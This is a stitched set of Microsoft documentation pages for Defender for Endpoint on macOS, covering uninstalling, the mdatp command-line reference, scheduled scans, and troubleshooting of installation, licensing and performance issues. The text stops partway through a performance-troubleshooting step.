-> [!NOTE]
-> Before uninstalling Microsoft Defender for Endpoint on macOS, please offboard per [Offboard non-Windows devices](configure-endpoints-non-windows.md).
-
-There are several ways to uninstall Microsoft Defender for Endpoint on macOS. Note that while centrally managed uninstall is available on JAMF, it is not yet available for Microsoft Intune.
-
-### Interactive uninstallation
--- Open **Finder > Applications**. Right click on **Microsoft Defender for Endpoint > Move to Trash**.-
-### Supported output types
-
-Supports table and JSON format output types. For each command, there's a default output behavior. You can modify the output in your preferred output format using the following commands:
-
-`-output json`
-
-`-output table`
-
-### From the command line
--- `sudo '/Library/Application Support/Microsoft/Defender/uninstall/uninstall'`-
-### Using JAMF Pro
-
-To uninstall Microsoft Defender for Endpoint on macOS using JAMF Pro upload the **offboarding profile**.
-
-The **offboarding profile** should be uploaded without any modifications, and with Preference Domain name set to **com.microsoft.wdav.atp.offboarding**:
-
- :::image type="content" source="../../media/defender-endpoint/jamf-pro-offboarding.png" alt-text="Screenshot of the JAMF offboarding screen" lightbox="../../media/defender-endpoint/jamf-pro-offboarding.png":::
-
-## Configuring from the command line
-
-Important tasks, such as controlling product settings and triggering on-demand scans, can be done from the command line:
-
-|Group|Scenario|Command|
-||||
-|Configuration|Turn on/off antivirus passive mode|`mdatp config passive-mode --value [enabled/disabled]`|
-|Configuration|Turn on/off real-time protection|`mdatp config real-time-protection --value [enabled/disabled]`|
-|Configuration|Turn on/off cloud protection|`mdatp config cloud --value [enabled/disabled]`|
-|Configuration|Turn on/off product diagnostics|`mdatp config cloud-diagnostic --value [enabled/disabled]`|
-|Configuration|Turn on/off automatic sample submission|`mdatp config cloud-automatic-sample-submission --value [enabled/disabled]`|
-|Configuration|Turn on/audit/off PUA protection|`mdatp threat policy set --type potentially_unwanted_application -- action [block/audit/off`|
-|Configuration|Add/remove an antivirus exclusion for a process|`mdatp exclusion process [add/remove] --path [path-to-process]`or `mdatp exclusion process [add\|remove] --name [process-name]`|
-|Configuration|Add/remove an antivirus exclusion for a file|`mdatp exclusion file [add/remove] --path [path-to-file]`|
-|Configuration|Add/remove an antivirus exclusion for a directory|`mdatp exclusion folder [add/remove] --path [path-to-directory]`|
-|Configuration|Add/remove an antivirus exclusion for a file extension|`mdatp exclusion extension [add/remove] --name [extension]`|
-|Configuration|List all antivirus exclusions|`mdatp exclusion list`|
-|Configuration|Configure degree of parallelism for on-demand scans|`mdatp config maximum-on-demand-scan-threads --value [numerical-value-between-1-and-64]`|
-|Configuration|Turn on/off scans after security intelligence updates|`mdatp config scan-after-definition-update --value [enabled/disabled]`|
-|Configuration|Turn on/off archive scanning (on-demand scans only)|`mdatp config scan-archives --value [enabled/disabled]`|
-|Configuration|Turn on/off file hash computation|`mdatp config enable-file-hash-computation --value [enabled/disabled]`|
-|Protection|Scan a path|`mdatp scan custom --path [path] [--ignore-exclusions]`|
-|Protection|Do a quick scan|`mdatp scan quick`|
-|Protection|Do a full scan|`mdatp scan full`|
-|Protection|Cancel an ongoing on-demand scan|`mdatp scan cancel`|
-|Protection|Request a security intelligence update|`mdatp definitions update`|
-|Configuration|Add a threat name to the allowed list|`mdatp threat allowed add --name [threat-name]`|
-|Configuration|Remove a threat name from the allowed list|`mdatp threat allowed remove --name [threat-name]`|
-|Configuration|List all allowed threat names|`mdatp threat allowed list`|
-|Protection history|Print the full protection history|`mdatp threat list`|
-|Protection history|Get threat details|`mdatp threat get --id [threat-id]`|
-|Quarantine management|List all quarantined files|`mdatp threat quarantine list`|
-|Quarantine management|Remove all files from the quarantine|`mdatp threat quarantine remove-all`|
-|Quarantine management|Add a file detected as a threat to the quarantine|`mdatp threat quarantine add --id [threat-id]`|
-|Quarantine management|Remove a file detected as a threat from the quarantine|`mdatp threat quarantine remove --id [threat-id]`|
-|Quarantine management|Restore a file from the quarantine. Available in Defender for Endpoint version lower than 101.23092.0012.|`mdatp threat quarantine restore --id [threat-id] --path [destination-folder]`|
-|Quarantine management|Restore a file from the quarantine with Threat ID. Available in Defender for Endpoint version 101.23092.0012 or higher.|`mdatp threat restore threat-id --id [threat-id] --destination-path [destination-folder]`|
-|Quarantine management|Restore a file from the quarantine with Threat Original Path. Available in Defender for Endpoint version 101.23092.0012 or higher.|`mdatp threat restore threat-path --path [threat-original-path] --destination-path [destination-folder]`|
-|Network Protection Configuration|Configure the Network Protection enforcement level|`mdatp config network-protection enforcement-level --value [Block/Audit/Disabled]`|
-|Network Protection management|Check Network protection has been started successfully|`mdatp health --field network_protection_status`|
-|Device Control management|Is Device Control enabled, and what is the Default Enforcement?|`mdatp device-control policy preferences list`|
-|Device Control management|What Device Control policy is enabled?|`mdatp device-control policy rules list`|
-|Device Control management|What Device Control policy groups are enabled?|`mdatp device-control policy groups list`|
-|Configuration|Turn on/off data loss prevention|`mdatp config data_loss_prevention --value [enabled/disabled]`|
-|Diagnostics|Change the log level|`mdatp log level set --level [error/warning/info/verbose]`|
-|Diagnostics|Generate diagnostic logs|`mdatp diagnostic create --path [directory]`|
-|Health|Check the product's health|`mdatp health`|
-|Health|Check for a specific product attribute|`mdatp health --field [attribute: healthy/licensed/engine_version...]`|
-|EDR|EDR list exclusions (root)|`mdatp edr exclusion list [processes|paths|extensions|all]`|
-|EDR|Set/Remove tag, only GROUP supported|`mdatp edr tag set --name GROUP --value [name]`|
-|EDR|Remove group tag from device|`mdatp edr tag remove --tag-name [name]`|
-|EDR|Add Group ID|`mdatp edr group-ids --group-id [group]`|
-
-### How to enable autocompletion
-
-To enable autocompletion in bash, run the following command and restart the Terminal session:
-
-```bash
-echo "source /Applications/Microsoft\ Defender.app/Contents/Resources/Tools/mdatp_completion.bash" >> ~/.bash_profile
-```
-
-To enable autocompletion in zsh:
--- Check whether autocompletion is enabled on your device:-
- ```zsh
- cat ~/.zshrc | grep autoload
- ```
--- If the preceding command does not produce any output, you can enable autocompletion using the following command:-
- ```zsh
- echo "autoload -Uz compinit && compinit" >> ~/.zshrc
- ```
--- Run the following commands to enable autocompletion for Microsoft Defender for Endpoint on macOS and restart the Terminal session:-
- ```zsh
- sudo mkdir -p /usr/local/share/zsh/site-functions
-
- sudo ln -svf "/Applications/Microsoft Defender.app/Contents/Resources/Tools/mdatp_completion.zsh" /usr/local/share/zsh/site-functions/_mdatp
- ```
-
-## Client Microsoft Defender for Endpoint quarantine directory
-
-`/Library/Application Support/Microsoft/Defender/quarantine/` contains the files quarantined by `mdatp`. The files are named after the threat trackingId. The current trackingIds is shown with `mdatp threat list`.
-
-## Microsoft Defender for Endpoint portal information
-The Microsoft Defender for Endpoint blog,
-[EDR capabilities for macOS have now arrived](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/edr-capabilities-for-macos-have-now-arrived/ba-p/1047801) provides detailed guidance on what to expect.
security Mac Schedule Scan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-schedule-scan.md
- Title: How to schedule scans with Microsoft Defender for Endpoint on macOS
-description: Learn how to schedule an automatic scanning time for Microsoft Defender for Endpoint in macOS to better protect your organization's assets.
---- Previously updated : 04/09/2024---- m365-security-- tier3-- mde-macos----
-# Schedule scans with Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## Schedule a scan *built-in to* Microsoft Defender for Endpoint on macOS
-
-While you can start a threat scan at any time with Microsoft Defender for Endpoint, your enterprise might benefit from scheduled or timed scans. For example, you can schedule a scan to run at the beginning of every workday or week.
-
-There are three types of scheduled scans that are configurable: hourly, daily, and weekly scans. Hourly and daily scheduled scans are always run as quick scans, weekly scans can be configured to be either quick or full scans. It is possible to have all three types of scheduled scans at the same time. See the samples below.
-
-**Prerequisites**:
--- Platform Update version: [101.23122.0005](mac-whatsnew.md#jan-2024-build-101231220005release-version-2012312250) or newer-
-## Schedule a scan with *Microsoft Defender for Endpoint on macOS*
-
-You can create a scheduled scan for your macOS, which is built in to *Microsoft Defender for Endpoint on macOS*.
-
-For more information on the _.plist_ file format used here, see [About Information Property List Files](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/AboutInformationPropertyListFiles.html) at the official Apple developer website.
-
-The following sample shows the daily and/or weekly configuration for the scheduled scan on macOS.
-
-> [!TIP]
-> Schedules are based on the local time zone of the device.
-
-| Parameter | The acceptable values for this parameter are: |
-| | |
-| scheduledScan | enabled or disabled |
-| scanType | quick or full |
-| ignoreExclusions | true or false |
-| lowPriorityScheduledScan | true or false |
-| dayOfWeek | The range is between 0 and 8. <br>- 0: Everyday <br>- 1: Sunday <br>- 2: Monday <br>- 3: Tuesday <br>- 4: Wednesday <br>- 5: Thursday <br>- 6: Friday <br>- 7: Saturday <br>- 8: Never |
-| timeOfDay | Specifies the time of day, as the number of _minutes after midnight_, to perform a scheduled scan. The time refers to the local time on the computer. If you don't specify a value for this parameter, a scheduled scan runs at a default time of two hours after midnight. |
-| interval | 0 (never), every 1 (hour) to 24 (hours, 1 scan per day) |
-| randomizeScanStartTime | Only applicable for daily quick scans or weekly quick/full scans. Randomize the start time of the scan by up to specified number of hours. <br> For example, if a scan is scheduled for 2 p.m and randomizeScanStartTime is set to 2, the scan commences at a random time between 2 p.m and 4 p.m. |
-
-Your scheduled scan runs at the date, time, and frequency you defined in your _plist_.
-
-### Example 1: Schedule a daily quick scan and weekly full scan using a _plist_
-
-In the following example, the daily quick scan configuration is set to run at 885 minutes after midnight (2:45 p.m.).<br>
-The weekly configuration is set to run a full scan on Wednesday at 880 minutes after midnight (2:40 p.m.).
-And it's set to ignore exclusions and run a low priority scan.
-
-The following code shows the schema you need to use to schedule scans according to the requirements above.
-
-1. Open a text editor and use this example as a guide for your own scheduled scan file.
-
-``` XML
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>features</key>
- <dict>
- <key>scheduledScan</key>
- <string>enabled</string>
- </dict>
- <key>scheduledScan</key>
- <dict>
- <key>ignoreExclusions</key>
- <true/>
- <key>lowPriorityScheduledScan</key>
- <true/>
- <key>dailyConfiguration</key>
- <dict>
- <key>timeOfDay</key>
- <integer>885</integer>
- </dict>
- <key>weeklyConfiguration</key>
- <dict>
- <key>dayOfWeek</key>
- <integer>4</integer>
- <key>timeOfDay</key>
- <integer>880</integer>
- <key>scanType</key>
- <string>full</string>
- </dict>
- </dict>
-</dict>
-</plist>
-```
-
-2. Save the file as _com.microsoft.wdav.plist_.
-
-### Example 2: Schedule an hourly quick scan, a daily quick scan, and weekly full scan using a _plist_
-
-In the following example, an hourly quick scan will run every 6 hours, a daily quick scan configuration is set to run at 885 minutes after midnight (2:45 p.m.), and a weekly full scan will run on Wednesdays at 880 minutes after midnight (2:40 p.m).
-1. Open a text editor and use this example.
-
-```XML
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>features</key>
- <dict>
- <key>scheduledScan</key>
- <string>enabled</string>
- </dict>
-<key>scheduledScan</key>
-<dict>
- <key>ignoreExclusions</key>
- <true/>
- <key>lowPriorityScheduledScan</key>
- <true/>
- <key>dailyConfiguration</key>
- <dict>
- <key>timeOfDay</key>
- <integer>885</integer>
- <key>interval</key>
- <string>1</string>
- </dict>
- <key>weeklyConfiguration</key>
- <dict>
- <key>dayOfWeek</key>
- <integer>4</integer>
- <key>timeOfDay</key>
- <integer>880</integer>
- <key>scanType</key>
- <string>full</string>
- </dict>
- </dict>
- </dict>
-</plist>
-```
-
-2. Save the file as _com.microsoft.wdav.plist_.
-
-### Option 3: Configure scheduled scans through CLI tool
-
-To enable scheduled scan feature:
-
-|Version|Command|
-|||
-| Version 101.23122.\* or higher | `sudo mdatp config scheduled-scan settings feature --value enabled` |
-
-To schedule hourly quick scans:
-
-|Version|Command|
-|||
-| Version 101.23122.\* or higher | `sudo mdatp config scheduled-scan quick-scan hourly-interval --value \<arg\>` |
--
-To schedule daily quick scans:
-
-|Version|Command|
-|||
-| Version 101.23122.\* or higher | `sudo mdatp config scheduled-scan quick-scan time-of-day --value \<arg\>` |
--
-To schedule weekly scans:
-
-|Version|Command|
-|||
-| Version 101.23122.\* or higher | `sudo mdatp config scheduled-scan weekly-scan --day-of-week \<arg\> --time-of-day \<arg\>--scan-type \<arg\>` |
--
-For other configuration options:
--- To check for definitions update before scheduled scans:-
- `sudo mdatp config scheduled-scan settings check-for-definitions --value true`
--- To use low priority threads for scheduled scanning:-
- `sudo mdatp config scheduled-scan settings low-priority --value true`
-
-### Check that the scheduled scan ran
-Use the following command:
-
-`mdatp scan list`
--
-`\<snip\>`
--
-
-> [!IMPORTANT]
-> Scheduled scans do not run at the scheduled time while the device is asleep. Instead, scheduled scans run when the device resumes from sleep mode.
-> If the device is turned off, the scan runs at the next scheduled scan time.
-
-> [!TIP]
-> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [**Microsoft Defender for Endpoint Tech Community**](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bd-p/MicrosoftDefenderATP).
security Mac Support Install https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-install.md
- Title: Troubleshoot installation issues for Microsoft Defender for Endpoint on Mac
-description: Troubleshoot installation issues in Microsoft Defender for Endpoint on Mac.
------- m365-security-- tier3-- mde-macos-- Previously updated : 12/18/2020--
-# Troubleshoot installation issues for Microsoft Defender for Endpoint on macOS
---
-**Applies to:**
--- [Microsoft Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## Installation failed
-
-For manual installation, the Summary page of the installation wizard says, "An error occurred during installation. The Installer encountered an error that caused the installation to fail. Contact the software publisher for assistance." For MDM deployments, it displays as a generic installation failure as well.
-
-While we don't display an exact error to the end user, we keep a log file with installation progress in `/Library/Logs/Microsoft/mdatp/install.log`. Each installation session appends to this log file. You can use `sed` to output the last installation session only:
-
-```bash
-sed -n 'H; /^preinstall com.microsoft.wdav begin/h; ${g;p;}' /Library/Logs/Microsoft/mdatp/install.log
-```
-```Output
-preinstall com.microsoft.wdav begin [2020-03-11 13:08:49 -0700] 804
-INSTALLER_SECURE_TEMP=/Library/InstallerSandboxes/.PKInstallSandboxManager/CB509765-70FC-4679-866D-8A14AD3F13CC.activeSandbox/89FA879B-971B-42BF-B4EA-7F5BB7CB5695
-correlation id=CB509765-70FC-4679-866D-8A14AD3F13CC
-[ERROR] Downgrade from 100.88.54 to 100.87.80 is not permitted
-preinstall com.microsoft.wdav end [2020-03-11 13:08:49 -0700] 804 => 1
-```
-
-In this example, the actual reason is prefixed with `[ERROR]`.
-The installation failed because a downgrade between these versions isn't supported.
-
-## MDATP install log missing or not updated
-
-In rare cases, installation leaves no trace in MDATP's /Library/Logs/Microsoft/mdatp/install.log file.
-First, verify that an installation happened. Then analyze possible errors by querying macOS logs. It's helpful to do this in MDM deployments, when there's no client UI. We recommend that you use a narrow time window to run a query and filter by the logging process name, as there will be a huge amount of information.
-
-```bash
-grep '^2020-03-11 13:08' /var/log/install.log
-```
-```Output
-log show --start '2020-03-11 13:00:00' --end '2020-03-11 13:08:50' --info --debug --source --predicate 'processImagePath CONTAINS[C] "install"' --style syslog
-```
security Mac Support License https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-license.md
- Title: Troubleshoot license issues for Microsoft Defender for Endpoint on Mac
-description: Troubleshoot license issues in Microsoft Defender for Endpoint on Mac.
------- m365-security-- tier3-- mde-macos-- Previously updated : 03/19/2024--
-# Troubleshoot license issues for Microsoft Defender for Endpoint on macOS
---
-**Applies to:**
--- [Microsoft Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## No license found
-
-When [Microsoft Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md) is being deployed, an error message with an **x** on top of the Microsoft Defender for Endpoint on macOS shield appears.
-
-Select the **x** symbol.
--
-### Message
-
-When you select the **x** symbol, you see options as shown in the following screenshot:
--
-When you select **Action needed**, you get the error message as shown in the following screenshot:
--
-You encounter this message in a different way: If you're using the terminal to enter **mdatp health** without the double quotes, the message as shown in the following screenshot is displayed:
--
-### Cause
--- You can encounter an error if you've deployed and/or installed the Microsoft Defender for Endpoint on macOS package [Download installation packages](mac-install-manually.md#download-installation-and-onboarding-packages), but you might not have run the configuration script [Download the onboarding package](mac-install-with-intune.md#step-15-download-the-onboarding-package) that contains the license settings. For information on troubleshooting in this scenario, see [If you didn't run the configuration script](#if-you-did-not-run-the-configuration-script).--- You can encounter an error message when the Microsoft Defender for Endpoint on macOS agent isn't up to date. For information on troubleshooting in this scenario, see [If Microsoft Defender for Endpoint on macOS isn't up to date](#if-microsoft-defender-for-endpoint-on-macos-is-not-up-to-date).--- You can encounter an error message if you offboarded and reonboarded Mac from Microsoft Defender for Endpoint on macOS.--- You can encounter an error message if a license isn't assigned to a user. For information on troubleshooting in this scenario, see [If a license isn't assigned to a user](#if-a-license-is-not-assigned-to-a-user).-
-### Solutions
-
-#### If you did not run the configuration script
-
-This section describes the troubleshooting measures when the error/warning message is caused by nonexecution of the configuration script. The script contains the license settings when the Microsoft Defender for Endpoint on macOS package is installed and deployed.
-
-Depending on the deployment management tool used, follow the tool-specific instructions to onboard the package (register the license) as described in the following table:
-
-|Management |License deployment instructions (Onboarding instructions) |
-|||
-|Intune | [Download the onboarding package](mac-install-with-intune.md#step-15-download-the-onboarding-package) |
-|JamF | [Step 1: Get the Microsoft Defender for Endpoint onboarding package](mac-jamfpro-policies.md#step-1-get-the-microsoft-defender-for-endpoint-onboarding-package) |
-|Other MDM | [License settings](mac-install-with-other-mdm.md#license-settings) |
-|Manual installation | [Download installation and onboarding packages](mac-install-manually.md#download-installation-and-onboarding-packages); and [Onboarding Package](mac-install-manually.md#onboarding-package) |
-
-> [!NOTE]
-> If the onboarding package runs correctly, the licensing information will be located in `/Library/Application Support/Microsoft/Defender/com.microsoft.wdav.atp.plist`.
-
-#### If Microsoft Defender for Endpoint on macOS is not up to date
-
-For scenarios where Microsoft Defender for Endpoint on macOS isn't up to date, you need to [update](mac-updates.md) the agent.
-
-#### If Microsoft Defender for Endpoint on macOS has been offboarded
-
-When the offboarding script is executed on the macOS, it saves a file in `/Library/Application Support/Microsoft/Defender/` and it's named `com.microsoft.wdav.atp.offboarding.plist`.
-
-If the file exists, it will prevent the macOS from being onboarded again. Delete the **com.microsoft.wdav.atp.offboarding.plist** running the onboarding script again.
-
-#### If a license is not assigned to a user
-
-1. In the Microsoft Defender portal (security.microsoft.com), select **Settings**, and then select **Endpoints**.
-
- :::image type="content" source="media/endpoints-option-on-settings-screen.png" alt-text="Screenshot of the Settings screen on which the Endpoints option is listed." lightbox="media/endpoints-option-on-settings-screen.png":::
-
-2. Select **Licenses**.
-
- :::image type="content" source="media/selecting-licenses-option-from-endpoints-screen.png" alt-text="Screenshot of the Endpoints page from which the Licenses options can be selected." lightbox="media/selecting-licenses-option-from-endpoints-screen.png":::
-
-3. Select **View and purchase licenses in the Microsoft 365 admin center**. The following screen in the Microsoft 365 admin center portal appears:
-
- :::image type="content" source="media/m365-admin-center-purchase-assign-licenses.png" alt-text="Screenshot of the Microsoft 365 admin center portal page from which licenses can be purchased and assigned." lightbox="media/m365-admin-center-purchase-assign-licenses.png":::
-
-4. Check the checkbox of the license you want to purchase from Microsoft, and select it. The screen displaying detail of the chosen license appears:
-
- :::image type="content" source="media/resultant-screen-of-selecting-preferred-license.png" alt-text="Screenshot of the product page from which you can select the option of assigning the purchased license.":::
-
-5. Select the **Assign licenses** link.
-
- :::image type="content" source="media/assign-licenses-link.png" alt-text="Screenshot of the product page from which you can select the Assign licenses link.":::
-
- The following screen appears:
-
- :::image type="content" source="media/screen-containing-option-to-assign-licenses.png" alt-text="Screenshot of the page containing the + Assign licenses option." lightbox="media/screen-containing-option-to-assign-licenses.png":::
-
-6. Select **+ Assign licenses**.
-
-7. Enter the name or email address of the person to whom you want to assign this license. The following screen appears, displaying the details of the chosen license assignee and a list of options.
-
- :::image type="content" source="media/assignee-details-and-options.png" alt-text="Screenshot of the page displaying the assignee's details and a list of options.":::
-
-8. Check the checkboxes for **Microsoft 365 Advanced Auditing**, **Microsoft Defender XDR**, and **Microsoft Defender for Endpoint**. Then select **Save**.
-
-On implementing these solution-options (either of them), if the licensing issues have been resolved, and then you run **mdatp health**, you should see the following results:
--
-## Sign in with your Microsoft account
--
-### Message
-
-Sign in with your Microsoft account to get started.
-
-Create new account or Switch to enterprise app.
-
-### Cause
-
-You've downloaded and installed [Microsoft Defender for individuals on macOS](https://www.microsoft.com/en-us/microsoft-365/microsoft-defender-for-individuals) on top of previously installed Microsoft Defender for Endpoint.
-
-### Solution
-
-Select **Switch to enterprise app** to switch to Enterprise experience.
-
-You can also suppress switching to experience for Individuals on MDM-enrolled machines by including **userInterface**/**consumerExperience** in the Defender's settings:
-
-```xml
-<key>userInterface</key>
-<dict>
- <key>consumerExperience</key>
- <string>disabled</string>
-</dict>
-```
-
-## Recommended content
--- [Manual deployment for Microsoft Defender for Endpoint on macOS](mac-install-manually.md): Install Microsoft Defender for Endpoint on macOS manually from the command line.-- [Set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro](mac-jamfpro-policies.md): Learn how to set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro.-- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md): Learn how to install, configure, update, and use Microsoft Defender for Endpoint on Mac.-- [Deploying Microsoft Defender for Endpoint on macOS with Jamf Pro](mac-install-with-jamf.md): Learn how to deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.-
security Mac Support Perf Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-perf-overview.md
- Title: Overview for how to troubleshoot performance issues for Microsoft Defender for Endpoint on macOS
-description: Troubleshoot performance issues overview for Microsoft Defender for Endpoint on macOS
---- Previously updated : 03/01/2024----
-# Overview for how to troubleshoot performance issues for Microsoft Defender for Endpoint on macOS
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint on macOS](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article provides general guidelines to identify performance issues related to Microsoft Defender for Endpoint on macOS. See [Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS](mac-support-perf.md) for more specific guidance.
-
-Depending on the applications that you're running and your device characteristics, you might experience suboptimal performance when running Microsoft Defender for Endpoint on macOS. In particular, applications or system processes that access many resources over a short timespan can lead to performance issues in Microsoft Defender for Endpoint on macOS.
-
-> [!CAUTION]
-> Running other third-party endpoint protection products alongside Microsoft Defender for Endpoint on MacOS is likely to lead to performance problems and unpredictable side effects. If non-Microsoft endpoint protection is an absolute requirement in your environment, you can configure Microsoft Defender Antivirus to run in **[Passive mode](/microsoft-365/security/defender-endpoint/mac-preferences)**. After you configure Passive mode, you can use Defender for Endpoint on Mac EDR functionality.
-
-> [!WARNING]
-> Before starting, make sure that other security products are not currently running on the device. Multiple security products might conflict and impact system performance.
-
-> [!TIP]
-> If you're running other third-party security products, make sure that the Microsoft Defender for Endpoint on macOS processes and paths are excluded from that 3rd party security product and that security product is excluded from Microsoft Defender for Endpoint on macOS.
-
-When troubleshooting performance issues for Microsoft Defender for Endpoint on macOS, you should review the **Activity Monitor** to see which of the three (3) processes is leading the high cpu utilization
-
-|Daemon name|Component|Troubleshooting guide|
-| -- | -- |-- |
-|wdavdaemon| Core (privileged)|Open a [Microsoft support case](/microsoft-365/security/defender-endpoint/contact-support).|
-|wdavdaemon_unpriviliged| Antimalware (AV, EPP)|Review [Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS](/microsoft-365/security/defender-endpoint/mac-support-perf).|
-|wdavdaemon_enterprise| Endpoint Detection and Response (EDR)|Open a [Microsoft support case](/microsoft-365/security/defender-endpoint/contact-support).|
-
-Additionally, gather [Defender for Endpoint Client Analyzer](/microsoft-365/security/defender-endpoint/run-analyzer-macos-linux) files while the issue occurs. This will be used by the support team to investigate the issue.
-
security Mac Support Perf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-perf.md
- Title: Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS
-description: Troubleshoot performance issues in Microsoft Defender for Endpoint on macOS.
------- m365-security-- tier3-- mde-macos-- Previously updated : 03/20/2024--
-# Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1 and Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-This article provides some general steps that can be used to narrow down performance issues related to Defender for Endpoint on macOS.
-
-Depending on the applications that you're running and your device characteristics, you might experience suboptimal performance when running Microsoft Defender for Endpoint on macOS. In particular, applications or system processes that access many resources over a short timespan can lead to performance issues in Defender for Endpoint on macOS.
-
-> [!WARNING]
-> Before you perform the procedures described in this article, make sure that other security products are not currently running on the device. Multiple security products can conflict and impact the host performance.
-
-## Troubleshoot performance issues using real-time protection statistics
-
-**Applies to:**
--- Only performance issues related to Microsoft Defender Antivirus (`wdavdaemon_unpriviliged`).-
-Real-time protection (RTP) is a feature of Defender for Endpoint on macOS that continuously monitors and protects your device against threats. It consists of file and process monitoring and other heuristics.
-
-Prerequisites:
--- Microsoft Defender for Endpoint version (Platform Update) 100.90.70 or newer-- If you have [Tamper protection](tamperprotection-macos.md) turned on in block mode, use [Troubleshooting mode](mac-troubleshoot-mode.md) to capture real-time-protection-statistics. Otherwise, you will get null results. -
-To troubleshoot and mitigate such issues, follow these steps:
-
-1. Disable real-time protection by using one of the methods in the following table, and then observe whether performance improves. This approach helps narrow down whether Microsoft Defender for Endpoint on macOS is contributing to the performance issues.
-
- | Device management | Method |
- ||--|
- | Device isn't managed by organization | **User interface**: Open Microsoft Defender for Endpoint on macOS and navigate to **Manage settings**. |
- | Device isn't managed by organization | **Terminal**: In Terminal, run the following command: `mdatp config real-time-protection --value disabled` |
- | Device is managed by organization | See [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md). |
-
- If the performance problem persists while real-time protection is off, the origin of the problem could be the endpoint detection and response component. In this case, contact customer support for further instructions and mitigation.
-
-2. Open Finder and navigate to **Applications** > **Utilities**. Open **Activity Monitor** and analyze which applications are using the resources on your system. Typical examples include software updaters and compilers.
-
-3. This feature requires real-time protection to be enabled. To check the status of real-time protection, run the following command:
-
- ```bash
- mdatp health --field real_time_protection_enabled
- ```
-
- Verify that the **real_time_protection_enabled** entry is *true*. Otherwise, run the following command to enable it:
-
- ```bash
- mdatp config real-time-protection --value enabled
- ```
-
- ```output
- Configuration property updated
- ```
-
-4. To find the applications that are triggering the most scans, you can use real-time statistics gathered by Defender for Endpoint on macOS. Run the following command:
-
- ```bash
- mdatp config real-time-protection-statistics --value enabled.
- ```
-
- This feature requires real-time protection to be enabled. To check the status of real-time protection, run the following command:
-
- ```bash
- mdatp diagnostic real-time-protection-statistics --output json > real_time_protection.json
- ```
-
- > [!NOTE]
- > Using `--output json` (note the double dash) ensures that the output format is ready for parsing. The output of this command will show all processes and their associated scan activity.
-
-5. On your Mac system, download the sample Python parser `high_cpu_parser.py` using the command:
-
- ```bash
